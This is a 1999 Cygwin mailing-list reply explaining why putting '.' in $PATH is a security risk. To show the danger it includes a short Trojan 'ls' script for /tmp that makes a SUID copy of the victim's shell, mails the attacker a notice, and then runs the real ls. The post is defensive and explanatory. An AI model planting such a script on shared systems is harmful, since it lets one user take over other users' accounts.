"." in $PATH
Michael Wood
wood@kingsley.co.za
Sun Jan 31 23:52:00 GMT 1999
Hi
-----Original Message-----
From: Will Mooar <willm@ihug.co.nz>
To: SWarsMatt@aol.com <SWarsMatt@aol.com>; gnu-win32@cygnus.com
<gnu-win32@cygnus.com>
Date: Monday, January 11, 1999 5:12 PM
Subject: Re: Problem with /bin mount?
>This is normal for unix (and cygwin) - it only searches for applications to
>run from the PATH environment variable. If "." is not in the PATH, it
won't
>find configure in the current directory.
>
>I have seen people mention that this is generally a bad idea, as it may
pose
>a security threat. Unfortunately, no-one has elaborated why. I can't see
>why it would be a problem for windows, except that it might accidentally
run
>the wrong thing if two or more programs exist with the same name, but
>function differently.
This is exactly what the security risk is.
If the default path on a machine looks like this:
.:/bin:/usr/bin:/usr/local/bin
and I put the following script in /tmp:
#!/bin/sh
cp /bin/sh /tmp/.sh.$$
chown $UID /tmp/.sh.$$
chmod 4755 /tmp/.sh.$$
echo "$$" | mail -s "Got one" me
ls $*
and call it "ls", I could collect shells for other peoples' accounts by
waiting for them to cd to /tmp and type "ls".
If "." is last in the path, I would have to name the script something like
"sl" and wait for a typo.
If the person with . in their path is root, the problem is much worse.
The script could also try to delete files instead of creating a SUID shell
or do something else as the user executing it.
--
Michael Wood | Kingsley Technologies
wood@kingsley.co.za | Tel: +27 21 762 0276
-
For help on using this list (especially unsubscribing), send a message to
"gnu-win32-request@cygnus.com" with one line of text: "help".
More information about the Cygwin
mailing list